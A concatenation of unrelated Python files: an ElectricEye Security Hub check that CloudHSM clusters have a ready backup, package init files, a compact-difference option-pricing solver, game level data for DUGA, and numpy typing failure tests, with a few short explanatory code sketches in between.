@registry.register_check("cloudhsm")
def cloudhsm_cluster_backup_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[CloudHsm.3] CloudHsm clusters should have at least 1 backup in a READY state"""
hsm_clusters = describe_clusters(cache=cache)
iso8601Time = datetime.datetime.now(datetime.timezone.utc).isoformat()
for clstr in hsm_clusters["Clusters"]:
ClusterId = clstr["ClusterId"]
backups = cloudhsm.describe_backups(
Filters = {
'clusterIds': [ClusterId]
}
)
activeBackups = [x for x in backups['Backups'] if x['BackupState'] == 'READY']
if len(activeBackups) > 0:
#Passing Check
finding = {
"SchemaVersion": "2018-10-08",
"Id": ClusterId + "/cloudhsm-cluster-backup-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": ClusterId,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[CloudHsm.3] CloudHsm clusters should have at least 1 backup in a READY state",
"Description": f"CloudHSM cluster {ClusterId} has at least 1 backup in a READY state",
"Remediation": {
"Recommendation": {
"Text": "For more information on HSM Clusters refer to the AWS CloudHsm User Guide on managing Backups",
"Url": "https://docs.aws.amazon.com/cloudhsm/latest/userguide/backups.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCloudHsmCluster",
"Id": ClusterId,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"AwsCloudHsmCluster": {"ClusterId": ClusterId}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF DE.AE-2",
"NIST CSF DE.AE-3",
"NIST CSF DE.AE-5",
"NIST CSF DE.CM-1",
"NIST CSF DE.DP-2",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 AU-6",
"NIST SP 800-53 AU-12",
"NIST SP 800-53 IR-5",
"NIST SP 800-53 IR-6",
"AICPA TSC CC4.1",
"AICPA TSC CC5.1",
"ISO 27001:2013 A.10.1.2",
"ISO 27001:2013 A.12.4.1",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": ClusterId + "/cloudhsm-cluster-backup-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": ClusterId,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "HIGH"},
"Confidence": 99,
"Title": "[CloudHsm.3] CloudHsm clusters should have at least 1 backup in a READY state",
"Description": f"CloudHSM cluster {ClusterId} does not have at least 1 backup in a READY state",
"Remediation": {
"Recommendation": {
"Text": "For more information on HSM Clusters refer to the AWS CloudHsm User Guide on managing Backups",
"Url": "https://docs.aws.amazon.com/cloudhsm/latest/userguide/backups.html",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCloudHsmCluster",
"Id": ClusterId,
"Partition": awsPartition,
"Region": awsRegion,
"Details": {"AwsCloudHsmCluster": {"ClusterId": ClusterId}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF DE.AE-2",
"NIST CSF DE.AE-3",
"NIST CSF DE.AE-5",
"NIST CSF DE.CM-1",
"NIST CSF DE.DP-2",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 AU-6",
"NIST SP 800-53 AU-12",
"NIST SP 800-53 IR-5",
"NIST SP 800-53 IR-6",
"AICPA TSC CC4.1",
"AICPA TSC CC5.1",
"ISO 27001:2013 A.10.1.2",
"ISO 27001:2013 A.12.4.1",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
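Checks like the one above are generators that yield ASFF finding dictionaries one at a time. As a hedged sketch (the helper name and batching logic below are assumptions, not part of ElectricEye), such a generator can be drained into Security Hub in batches of at most 100 findings, the `BatchImportFindings` per-call limit:

```python
import itertools

def send_findings(findings, securityhub_client):
    """Drain an iterable of ASFF findings into Security Hub, 100 per call."""
    iterator = iter(findings)
    while True:
        # BatchImportFindings accepts at most 100 findings per request.
        batch = list(itertools.islice(iterator, 100))
        if not batch:
            break
        securityhub_client.batch_import_findings(Findings=batch)
```

In practice the client would be a boto3 `securityhub` client; any object exposing `batch_import_findings(Findings=...)` works.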
51b3251dc404c6a7d4d91588f4fa53a63dc7f8cb | 302 | py | Python | authApp/views/__init__.py | xlausae/4a-docs | e2d1038153f170d32d8edbe5ac3fe616ef554206 | [
"MIT"
] | 1 | 2021-11-29T14:17:07.000Z | 2021-11-29T14:17:07.000Z | authApp/views/__init__.py | xlausae/4a-docs | e2d1038153f170d32d8edbe5ac3fe616ef554206 | [
"MIT"
] | 2 | 2021-11-18T17:09:21.000Z | 2021-11-19T21:59:11.000Z | authApp/views/__init__.py | xlausae/4a-docs | e2d1038153f170d32d8edbe5ac3fe616ef554206 | [
"MIT"
] | 1 | 2021-11-18T03:19:28.000Z | 2021-11-18T03:19:28.000Z |
from .userCreateView import UserCreateView
from .userDetailView import UserDetailView
from .verifyTokenView import VerifyTokenView
from .ProductView import ProductCreateView
from .ProductView import ProductDeleteView
from .ProductView import ProductReadView
from .ProductView import ProductUpdateView
51e7b69647dc04aaef791f5c9f3fd049aa4e2c5d | 131 | py | Python | pyoculus/problems/__init__.py | mbkumar/pyoculus | 8c925b139e27fd016b37aa4fe4653276af67e0a5 | [
"MIT"
] | 4 | 2020-09-24T12:14:13.000Z | 2022-02-09T12:12:51.000Z | pyoculus/problems/__init__.py | mbkumar/pyoculus | 8c925b139e27fd016b37aa4fe4653276af67e0a5 | [
"MIT"
] | 1 | 2021-03-04T16:46:25.000Z | 2021-03-04T16:46:25.000Z | pyoculus/problems/__init__.py | mbkumar/pyoculus | 8c925b139e27fd016b37aa4fe4653276af67e0a5 | [
"MIT"
] | 4 | 2020-07-24T16:09:15.000Z | 2021-03-04T15:56:07.000Z |
from .base_problem import *
from .spec_problem import *
from .spec_bfield import *
from .spec_pjh import *
from .two_waves import *
cf9b4559395bbaf3d8538ae8d34596ab67be4d05 | 6,271 | py | Python | Semester 7/Computational Finance (MA 473)/Term Paper - Python/CCDScheme.py | Imperial-lord/IITG | df4233905d2954511d5b16666f0d44cc38b9df90 | [
"MIT"
] | 4 | 2021-03-02T03:58:55.000Z | 2022-03-28T13:38:05.000Z | Semester 7/Computational Finance (MA 473)/Term Paper - Python/CCDScheme.py | Imperial-lord/IITG | df4233905d2954511d5b16666f0d44cc38b9df90 | [
"MIT"
] | null | null | null | Semester 7/Computational Finance (MA 473)/Term Paper - Python/CCDScheme.py | Imperial-lord/IITG | df4233905d2954511d5b16666f0d44cc38b9df90 | [
"MIT"
] | 4 | 2021-02-04T17:44:23.000Z | 2022-03-28T13:38:09.000Z |
import numpy as np
from compositeBoole import compositeBool
from findUInitial import findUInitial
from findVWInitial import findVWInitial
from g import g
# One time level of the Combined Compact Difference (CCD) scheme: assemble the
# (3*M+3) x (3*M+3) linear system A X = B coupling u, v = u_x and w = u_xx at
# every grid node (the jump integral is discretized with composite Boole's rule),
# then solve for the new time level.
def findCCDScheme(u_n, v_n, w_n, N, M, b, T, r, lambda_val, sigma, nu, eta):
h = 2*b/M
k = T/N
x = np.arange(-b, b+h, h)
B = np.zeros(3*M+3)
A = np.zeros((3*M+3, 3*M+3))
for i in range(0, 3*M-3):
i1 = int((i+3)/3)
if i % 3 == 2:
gamma = compositeBool(u_n, M, b, r, lambda_val, sigma, nu, eta, i1)
B[i] = u_n[i1] + k*sigma*sigma/4*w_n[i1] + k*lambda_val*gamma/2
elif i % 3 == 0:
B[i] = -v_n[i1]
else:
B[i] = 0
gamma = compositeBool(u_n, M, b, r, lambda_val, sigma, nu, eta, 0)
B[3*M-3] = u_n[0] + k*sigma*sigma/4*w_n[0] + k*lambda_val*gamma/2
gamma = compositeBool(u_n, M, b, r, lambda_val, sigma, nu, eta, M)
B[3*M-2] = u_n[M] + k*sigma*sigma/4*w_n[M] + k*lambda_val*gamma/2
for i in range(0, 3*M-3):
i1 = int((i+3)/3)
if i % 3 == 2:
A[i][i1] = 1
A[i][2*M+2+i1] = -k*sigma*sigma/4
A[i][0] += (2*h/45) * (-k*lambda_val/2) * 7 * \
g(-b-x[i1], r, lambda_val, sigma, nu, eta)
A[i][M] += (2*h/45) * (-k*lambda_val/2) * 7 * \
g(b-x[i1], r, lambda_val, sigma, nu, eta)
for l in range(0, int(M/4)-1):
A[i][4*l+1] += (2*h/45) * (-k*lambda_val/2) * 32 * \
g(x[4*l+1]-x[i1], r, lambda_val, sigma, nu, eta)
A[i][4*l+2] += (2*h/45) * (-k*lambda_val/2) * 12 * \
g(x[4*l+2]-x[i1], r, lambda_val, sigma, nu, eta)
A[i][4*l+3] += (2*h/45) * (-k*lambda_val/2) * 32 * \
g(x[4*l+3]-x[i1], r, lambda_val, sigma, nu, eta)
A[i][4*l+4] += (2*h/45) * (-k*lambda_val/2) * 14 * \
g(x[4*l+4]-x[i1], r, lambda_val, sigma, nu, eta)
A[i][M-3] += (2*h/45) * (-k*lambda_val/2) * 32 * \
g(x[M-3]-x[i1], r, lambda_val, sigma, nu, eta)
A[i][M-2] += (2*h/45) * (-k*lambda_val/2) * 12 * \
g(x[M-2]-x[i1], r, lambda_val, sigma, nu, eta)
A[i][M-1] += (2*h/45) * (-k*lambda_val/2) * 32 * \
g(x[M-1]-x[i1], r, lambda_val, sigma, nu, eta)
elif i % 3 == 0:
A[i][i1-1] = (15/(16*h))
A[i][i1+1] = -(15/(16*h))
A[i][M+1+i1-1] = 7/16
A[i][M+1+i1+1] = 7/16
A[i][2*M+2+i1-1] = h/16
A[i][2*M+2+i1+1] = -h/16
else:
A[i][i1-1] = 3/(h*h)
A[i][i1] = -6/(h*h)
A[i][i1+1] = 3/(h*h)
A[i][M+1+i1-1] = 9/(8*h)
A[i][M+1+i1+1] = -9/(8*h)
A[i][2*M+2+i1-1] = 1/8
A[i][2*M+2+i1] = -1
A[i][2*M+2+i1+1] = 1/8
A[3*M-3][0] = 1
A[3*M-3][2*M+2] = -k*sigma*sigma/4
A[3*M-3][0] += (2*h/45) * (-k*lambda_val/2) * 7 * \
g(-b-x[0], r, lambda_val, sigma, nu, eta)
A[3*M-3][M] += (2*h/45) * (-k*lambda_val/2) * 7 * \
g(b-x[0], r, lambda_val, sigma, nu, eta)
for l in range(0, int(M/4)-1):
A[3*M-3][4*l+1] += (2*h/45) * (-k*lambda_val/2) * \
32 * g(x[4*l+1]-x[0], r, lambda_val, sigma, nu, eta)
A[3*M-3][4*l+2] += (2*h/45) * (-k*lambda_val/2) * \
12 * g(x[4*l+2]-x[0], r, lambda_val, sigma, nu, eta)
A[3*M-3][4*l+3] += (2*h/45) * (-k*lambda_val/2) * \
32 * g(x[4*l+3]-x[0], r, lambda_val, sigma, nu, eta)
A[3*M-3][4*l+4] += (2*h/45) * (-k*lambda_val/2) * \
14 * g(x[4*l+4]-x[0], r, lambda_val, sigma, nu, eta)
A[3*M-3][M-3] += (2*h/45) * (-k*lambda_val/2) * 32 * \
g(x[M-3]-x[0], r, lambda_val, sigma, nu, eta)
A[3*M-3][M-2] += (2*h/45) * (-k*lambda_val/2) * 12 * \
g(x[M-2]-x[0], r, lambda_val, sigma, nu, eta)
A[3*M-3][M-1] += (2*h/45) * (-k*lambda_val/2) * 32 * \
g(x[M-1]-x[0], r, lambda_val, sigma, nu, eta)
# FOR j=M
A[3*M-2][M] = 1
A[3*M-2][2*M+2+M] = -k*sigma*sigma/4
A[3*M-2][0] += (2*h/45) * (-k*lambda_val/2) * 7 * \
g(-b-x[M], r, lambda_val, sigma, nu, eta)
A[3*M-2][M] += (2*h/45) * (-k*lambda_val/2) * 7 * \
g(b-x[M], r, lambda_val, sigma, nu, eta)
for l in range(0, int(M/4)-1):
A[3*M-2][4*l+1] += (2*h/45) * (-k*lambda_val/2) * \
32 * g(x[4*l+1]-x[M], r, lambda_val, sigma, nu, eta)
A[3*M-2][4*l+2] += (2*h/45) * (-k*lambda_val/2) * \
12 * g(x[4*l+2]-x[M], r, lambda_val, sigma, nu, eta)
A[3*M-2][4*l+3] += (2*h/45) * (-k*lambda_val/2) * \
32 * g(x[4*l+3]-x[M], r, lambda_val, sigma, nu, eta)
A[3*M-2][4*l+4] += (2*h/45) * (-k*lambda_val/2) * \
14 * g(x[4*l+4]-x[M], r, lambda_val, sigma, nu, eta)
A[3*M-2][M-3] += (2*h/45) * (-k*lambda_val/2) * 32 * \
g(x[M-3]-x[M], r, lambda_val, sigma, nu, eta)
A[3*M-2][M-2] += (2*h/45) * (-k*lambda_val/2) * 12 * \
g(x[M-2]-x[M], r, lambda_val, sigma, nu, eta)
A[3*M-2][M-1] += (2*h/45) * (-k*lambda_val/2) * 32 * \
g(x[M-1]-x[M], r, lambda_val, sigma, nu, eta)
A[3*M-1][0] = 31/h
A[3*M-1][1] = -32/h
A[3*M-1][2] = 1/h
A[3*M-1][M+1] = 14
A[3*M-1][M+1+1] = 16
A[3*M-1][2*M+2] = 2*h
A[3*M-1][2*M+2+1] = -4*h
A[3*M][M] = -31/h
A[3*M][M-1] = 32/h
A[3*M][M-2] = -1/h
A[3*M][M+1+M] = 14
A[3*M][M+1+M-1] = 16
A[3*M][2*M+2+M] = -2*h
A[3*M][2*M+2+M-1] = 4*h
A[3*M+1][0] = 7/(2*h)
A[3*M+1][1] = -8/(2*h)
A[3*M+1][2] = 1/(2*h)
A[3*M+1][M+1] = 1
A[3*M+1][M+1+1] = 2
A[3*M+1][2*M+2+1] = -h
A[3*M+2][M] = -7/(2*h)
A[3*M+2][M-1] = 8/(2*h)
A[3*M+2][M-2] = -1/(2*h)
A[3*M+2][M+1+M] = 1
A[3*M+2][M+1+M-1] = 2
A[3*M+2][2*M+2+M-1] = h
    # Solve A X = B; np.linalg.solve is cheaper and more stable than forming inv(A).
    X = np.linalg.solve(A, B)
u_n1 = X[0:M+1]
v_n1 = X[M+1:2*M+2]
w_n1 = X[2*M+2:]
print(np.linalg.norm(np.matmul(A, X) - B))
return u_n1, v_n1, w_n1
u_n = findUInitial(1.5, 3/128, 100, -0.9, 0.45, 0.05, 0.15, 0.1, 'call')
v_n, w_n = findVWInitial(u_n, 3/128, 128)
for i in range(0, 25):
u_n, v_n, w_n = findCCDScheme(
u_n, v_n, w_n, 25, 128, 1.5, 0.25, 0.05, 0.1, 0.15, -0.9, 0.45)
# print(u_n[60])
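The `(2*h/45)` weight pattern 7, 32, 12, 32, 14 used throughout `findCCDScheme` for the jump integral is composite Boole's rule. A minimal self-contained sketch of that quadrature on its own (the function name is an assumption, not taken from the project):

```python
import numpy as np

def composite_boole(f, a, b, M):
    """Composite Boole's rule on M subintervals; M must be a multiple of 4."""
    x = np.linspace(a, b, M + 1)
    h = (b - a) / M
    w = np.full(M + 1, 14.0)   # interior panel joints get weight 7 + 7 = 14
    w[1::4] = 32.0
    w[2::4] = 12.0
    w[3::4] = 32.0
    w[0] = w[-1] = 7.0         # the two endpoints keep the single weight 7
    return (2.0 * h / 45.0) * np.sum(w * f(x))

# Boole's rule is exact for polynomials up to degree 5.
val = composite_boole(lambda t: t**4, 0.0, 1.0, 8)
```

The same weights appear in the assembly loops above as the literal factors `7`, `32`, `12`, `32` and `14` multiplying `(2*h/45)`.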
cfefb28b8cae3cf7795ea01c1036b0f5d2001264 | 8,180 | py | Python | LEVELS.py | TaliSman1007/meta2.5D | f29ba8ae58f977a92fa207ab6320ab029a50de24 | [
"CC0-1.0"
] | null | null | null | LEVELS.py | TaliSman1007/meta2.5D | f29ba8ae58f977a92fa207ab6320ab029a50de24 | [
"CC0-1.0"
] | null | null | null | LEVELS.py | TaliSman1007/meta2.5D | f29ba8ae58f977a92fa207ab6320ab029a50de24 | [
"CC0-1.0"
] | null | null | null |
#Level classes for DUGA
import SETTINGS
class Level:
def __init__(self, stats):
self.stats = stats
self.lvl_number = stats['lvl_number']
self.sky_color = stats['sky_color']
self.ground_color = stats['ground_color']
self.npcs = stats['npcs']
self.items = stats['items']
self.player_pos = stats['player_pos']
self.array = stats['array']
self.shade = stats['shade'][0]
self.shade_rgba = stats['shade'][1]
self.shade_visibility = stats['shade'][2]
if 'name' in stats:
self.name = stats['name']
if 'author' in stats:
self.author = stats['author']
##SETTINGS.levels_list.append(Level({
##'ground_color' : (255, 255, 255),
##'npcs' : [((4, 4), 90, 7)],
##'player_pos' : [1,2],
##'name' : None,
##'sky_color' : (255, 255, 255),
##'lvl_number' : 0,
##'shade' : (False, (0, 0, 0, 0), 0),
##'array' : [[1, 1, 1, 1, 1, 1, 1, 1, 1, 1], [1, 0, 0, 0, 0, 0, 0, 0, 0, 1], [1, 0, 0, 0, 0, 0, 0, 0, 0, 1], [1, 0, 0, 0, 0, 0, 0, 0, 0, 1], [1, 0, 0, 0, 0, 0, 0, 0, 0, 1], [1, 0, 0, 0, 0, 0, 0, 0, 0, 1], [1, 0, 0, 0, 0, 0, 0, 0, 0, 1], [1, 0, 0, 0, 0, 0, 0, 0, 0, 1], [1, 0, 0, 0, 0, 0, 0, 0, 0, 1], [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]],
##'items' : [((3,3), 13)],
##}))
##SETTINGS.levels_list.append(Level({
## 'lvl_number' : 0,
## 'sky_color' : SETTINGS.GRAY,
## 'ground_color': SETTINGS.LIGHTGRAY,
## 'npcs' : [([2,3], 270, 4), ([3,3], 270, 5)],#, ([3,3], 270, 3), ([4,3], 270, 3), ([1,3], 270, 3)],
## 'items' : [([1,1], 2), ([2,1], 3), ([3,1], 7), ([4, 1], 6), ([4,2], 8), ([3,2], 9), ([1,2], 11)],
## 'player_pos' : [2,2],
## 'shade' : (False, (0,0,0,0), 0),
## 'array' : [
## #0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8
## [1,1,1,1,1,1],
## [1,0,0,0,0,1],
## [1,0,0,0,0,1],
## [1,0,0,0,0,1],
## [1,0,0,0,0,1],
## [1,1,5,1,1,1]
## ]}))
##SETTINGS.levels_list.append(Level({
## 'lvl_number' : 1,
## 'sky_color' : SETTINGS.GRAY,
## 'ground_color': SETTINGS.BROWN,
## 'npcs' : [([2,6], 270, 4), ([10,10], 180, 1), ([17, 9], 180, 0)],
## 'items' : [([8,2], 8), ([2,7], 5), ([13,4], 0), ([10, 5], 2), ([12, 12], 2), ([16, 8], 1), ([16, 11], 0)],
## 'player_pos' : [6,1],
## 'shade' : (True, (0,0,0,0), 500),
## 'array' : [
## #0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8
## [0,0,0,0,0,1,1,2,1,0,0,0,0,0,0,0,0,0,0],
## [0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0],
## [0,0,0,0,1,0,0,8,0,1,0,0,0,0,0,0,0,0,0],
## [0,0,0,0,0,1,1,6,1,1,1,2,1,1,0,0,0,0,0],
## [0,0,0,0,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0],
## [0,5,5,5,1,0,8,0,0,0,0,1,8,0,1,0,0,0,0],
## [1,0,0,0,1,0,0,1,1,6,1,1,10,1,0,0,0,0,0],
## [2,0,8,0,1,0,0,1,7,0,0,0,0,0,1,5,2,5,0],
## [1,0,0,0,1,0,0,1,0,0,0,0,0,0,1,0,0,0,5],
## [0,1,1,0,1,0,0,1,1,1,3,1,1,1,1,0,0,0,3],
## [0,0,1,0,7,0,0,0,0,0,8,0,0,0,7,0,8,0,5],
## [0,0,1,1,1,7,0,1,1,1,1,1,1,6,1,0,0,0,5],
## [0,0,0,0,0,1,1,0,5,7,0,8,0,0,1,5,5,5,0],
## [0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0],
## [0,0,0,0,0,0,0,0,0,0,1,2,1,1,0,0,0,0,0],
## ]}))
##SETTINGS.levels_list.append(Level({
##'items' : [((2, 1), 7), ((1, 2), 1), ((2, 2), 3), ((3, 2), 3)],
##'npcs' : [((1, 4), 0, 5), ((2, 4), 90, 5), ((3, 4), 180, 5), ((4, 4), 180, 5), ((5, 4), 180, 5), ((1, 5), 90, 5), ((2, 5), 90, 5), ((3, 5), 180, 5), ((4, 5), 180, 5), ((5, 5), 180, 5), ((2, 6), 90, 5), ((3, 6), 90, 5), ((4, 6), 180, 5), ((5, 6), 180, 5)],
##'name' : None,
##'array' : [[0, 16, 17, 16, 0, 11, 11, 12, 11, 0], [16, 0, 0, 15, 16, 13, 19, 0, 21, 11], [16, 0, 0, 0, 18, 11, 19, 0, 0, 13], [0, 16, 10, 16, 16, 16, 11, 15, 0, 11], [5, 0, 0, 0, 0, 0, 16, 11, 0, 11], [5, 0, 0, 8, 0, 0, 9, 0, 0, 12], [5, 20, 0, 0, 0, 0, 16, 11, 0, 11], [0, 16, 16, 16, 16, 16, 11, 15, 0, 11], [0, 0, 0, 0, 0, 0, 11, 21, 0, 11], [0, 0, 0, 0, 0, 0, 0, 11, 14, 0]],
##'ground_color' : (255, 255, 255),
##'lvl_number' : None,
##'shade' : (False, (0,0,0,0), 0),
##'player_pos' : [1, 1],
##'sky_color' : (255, 255, 255),
##}))
##
##SETTINGS.levels_list.append(Level({
## 'lvl_number' : 2,
## 'sky_color': SETTINGS.LIGHTGRAY,
## 'ground_color': SETTINGS.LIGHTGRAY,
## 'npcs' : [([3,15], 90, 0), ([8,8], 0, 0), ([17,14], 270, 0), ([17, 11], 0, 1), ([5,11], 270, 3)],
## 'items' : [([5,15],2), ([6,5], 1), ([10, 1], 6),([9,1], 2), ([11,1], 2), ([1, 10], 2), ([2, 19], 2), ([10, 9], 0), ([15, 6], 1), ([15, 7], 3), ([7, 18], 0), ([7, 19], 2)],
## 'player_pos' : [6,2],
## 'array' : [
## #0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0
## [0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0],
## [0,0,0,0,0,0,1,0,1,0,8,0,1,0,0,0,0,0,0,0,0],
## [0,0,0,0,0,1,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0],
## [0,1,1,1,1,1,10,1,1,1,10,1,0,0,0,0,0,0,0,0,0],
## [1,0,0,0,0,0,0,0,0,0,0,7,1,0,1,1,0,0,0,0,0],
## [1,0,8,0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,0,0],
## [1,0,0,1,1,1,1,1,1,1,10,1,1,1,0,0,1,0,0,0,0],
## [1,0,0,1,0,0,1,0,0,0,0,0,0,9,0,0,1,0,0,0,0],
## [1,0,0,1,0,0,9,0,0,0,8,0,0,1,0,0,1,0,0,0,0],
## [1,0,0,1,0,0,1,7,0,0,0,0,0,1,1,1,0,0,4,0,0],
## [1,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,10,1,0],
## [1,0,8,0,0,0,0,0,0,8,0,0,0,0,1,1,0,0,0,0,1],
## [1,0,0,0,0,0,0,0,0,0,0,0,0,7,1,1,0,0,0,0,1],
## [0,1,1,10,1,1,1,1,1,1,1,1,10,1,1,0,1,1,10,1,0],
## [1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,0,0,0,0,1],
## [1,0,0,8,0,0,1,0,0,1,0,0,8,0,0,1,0,0,8,0,1],
## [0,1,10,1,1,1,1,1,1,1,1,1,0,1,1,1,0,0,0,0,1],
## [1,0,0,0,0,7,1,0,0,9,0,0,0,0,0,0,0,0,0,0,1],
## [1,0,0,8,0,0,1,0,0,1,1,1,1,1,1,1,1,1,1,1,0],
## [1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0],
## [0,1,1,1,1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0],
## ]}))
##
##SETTINGS.levels_list.append(Level({
## 'lvl_number' : 3,
## 'sky_color' : SETTINGS.GRAY,
## 'ground_color' : SETTINGS.DARKRED,
## 'npcs' : [([5,18], 90, 4), ([4,2], 270, 0), ([5,7], 180, 3)],
## 'items' : [([10,3],1), ([8,2],4), ([5,10],7), ([1,9],3), ([1,10],3), ([1,11],3), ([10,9],2), ([10,10],2), ([10,11],2), ([5,14],0), ([2,10],0), ([9,10],1),([1,18],0),([9,18],0)],
## 'player_pos' : [1,2],
## 'array' : [
## #0 1 2 3 4 5 6 7 8 9 0 11
## [0,0,0,1,2,1,0,1,1,0,5,0],#0
## [0,1,1,0,0,0,1,0,0,1,0,5],#1
## [1,0,9,0,8,0,9,0,0,9,0,5],#2
## [0,1,1,0,0,0,1,0,0,1,0,5],#3
## [0,0,0,1,1,1,1,0,0,1,5,0],#4
## [0,0,0,1,7,0,0,0,0,1,0,0],#5
## [0,0,0,2,0,8,0,1,1,0,0,0],#6
## [0,0,0,1,0,0,0,1,0,0,0,0],#7
## [0,1,1,0,1,10,1,0,1,1,1,0],#8
## [1,0,0,1,0,0,0,1,0,0,0,1],#9
## [3,0,8,9,0,8,0,9,0,8,0,2],#10
## [1,0,0,1,0,0,0,1,0,0,0,1],#11
## [0,1,1,0,1,10,1,0,1,3,1,0],#12
## [0,0,0,1,0,0,0,1,0,0,0,0],#13
## [0,0,0,1,0,8,0,1,0,0,0,0],#14
## [0,0,0,1,1,10,1,1,0,0,0,0],#15
## [0,1,1,0,0,8,0,0,1,1,0,0],#16
## [1,0,1,0,6,0,6,0,1,0,1,0],#17
## [2,0,9,8,0,8,0,8,9,0,3,0],#18
## [1,0,1,0,6,0,6,0,1,0,1,0],#19
## [0,1,1,0,0,8,0,0,1,1,0,0],#20
## [0,0,0,1,1,10,1,1,0,0,0,0],#21
## [0,0,0,5,0,0,0,5,0,0,0,0],#22
## [0,0,0,5,0,8,0,5,0,0,0,0],#23
## [0,0,0,0,1,10,1,0,0,0,0,0],#24
## [0,0,0,0,1,0,1,0,0,0,0,0],#25
## [0,0,0,0,0,4,0,0,0,0,0,0],#26
## ]}))
##
##SETTINGS.levels_list.append(Level({
##'items' : [((1, 1), 2), ((2, 1), 6), ((3, 1), 2)],
##'npcs' : [((8, 8), 180, 0), ((3, 10), 90, 2), ((8, 10), 180, 0)],
##'player_pos' : [3, 2],
##'sky_color' : SETTINGS.LIGHTGRAY,
##'array' : [[1, 1, 1, 1, 1, 0, 0, 0, 0, 0], [1, 0, 0, 0, 2, 0, 0, 0, 0, 0], [1, 0, 0, 0, 1, 0, 0, 0, 0, 0], [1, 1, 10, 1, 1, 1, 1, 1, 1, 1], [1, 0, 0, 0, 0, 0, 0, 0, 7, 1], [1, 0, 0, 0, 0, 0, 0, 0, 0, 1], [1, 0, 8, 0, 0, 0, 0, 0, 0, 1], [3, 0, 0, 0, 1, 1, 1, 2, 1, 1], [1, 0, 0, 0, 1, 0, 0, 0, 0, 5], [1, 0, 0, 0, 9, 0, 0, 8, 0, 4], [1, 0, 0, 0, 1, 0, 0, 0, 0, 5], [1, 2, 1, 1, 1, 5, 5, 5, 5, 5]],
##'ground_color' : SETTINGS.DARKGRAY,
##'lvl_number' : 4,
##}))
#NPC spawn syntax: [([map pos], face, id)]
#Item spawn syntax: [([map pos], id)]
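The two spawn syntaxes above can be illustrated with a small, hypothetical level (the positions, ids and the reduced Level class below are made up for demonstration only):

```python
class Level:
    """Reduced copy of the Level class above, kept to the fields used here."""
    def __init__(self, stats):
        self.stats = stats
        self.npcs = stats['npcs']
        self.items = stats['items']
        self.player_pos = stats['player_pos']

tiny = Level({
    'npcs': [([2, 3], 270, 4)],            # one NPC at map pos (2, 3), facing 270, id 4
    'items': [([1, 1], 2), ([3, 1], 7)],   # item id 2 at (1, 1), item id 7 at (3, 1)
    'player_pos': [2, 2],
})
print(tiny.npcs[0][1])  # -> 270
```

Each NPC entry is `([x, y], facing_degrees, npc_id)` and each item entry is `([x, y], item_id)`, matching the commented-out level definitions above.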
320f05df5228a8802dcd117dea9b8c8185a7a943 | 2,615 | py | Python | numpy/typing/tests/data/fail/char.py | fishmandev/numpy | 7e8285ba48179b19b4d251ac3447569141c7e8f7 | [
"BSD-3-Clause"
] | 1 | 2021-09-25T14:21:36.000Z | 2021-09-25T14:21:36.000Z | numpy/typing/tests/data/fail/char.py | fishmandev/numpy | 7e8285ba48179b19b4d251ac3447569141c7e8f7 | [
"BSD-3-Clause"
] | 79 | 2021-06-23T21:05:30.000Z | 2022-03-28T08:11:46.000Z | numpy/typing/tests/data/fail/char.py | fishmandev/numpy | 7e8285ba48179b19b4d251ac3447569141c7e8f7 | [
"BSD-3-Clause"
] | null | null | null |
import numpy as np
import numpy.typing as npt
AR_U: npt.NDArray[np.str_]
AR_S: npt.NDArray[np.bytes_]
np.char.equal(AR_U, AR_S) # E: incompatible type
np.char.not_equal(AR_U, AR_S) # E: incompatible type
np.char.greater_equal(AR_U, AR_S) # E: incompatible type
np.char.less_equal(AR_U, AR_S) # E: incompatible type
np.char.greater(AR_U, AR_S) # E: incompatible type
np.char.less(AR_U, AR_S) # E: incompatible type
np.char.encode(AR_S) # E: incompatible type
np.char.decode(AR_U) # E: incompatible type
np.char.join(AR_U, b"_") # E: incompatible type
np.char.join(AR_S, "_") # E: incompatible type
np.char.ljust(AR_U, 5, fillchar=b"a") # E: incompatible type
np.char.ljust(AR_S, 5, fillchar="a") # E: incompatible type
np.char.rjust(AR_U, 5, fillchar=b"a") # E: incompatible type
np.char.rjust(AR_S, 5, fillchar="a") # E: incompatible type
np.char.lstrip(AR_U, chars=b"a") # E: incompatible type
np.char.lstrip(AR_S, chars="a") # E: incompatible type
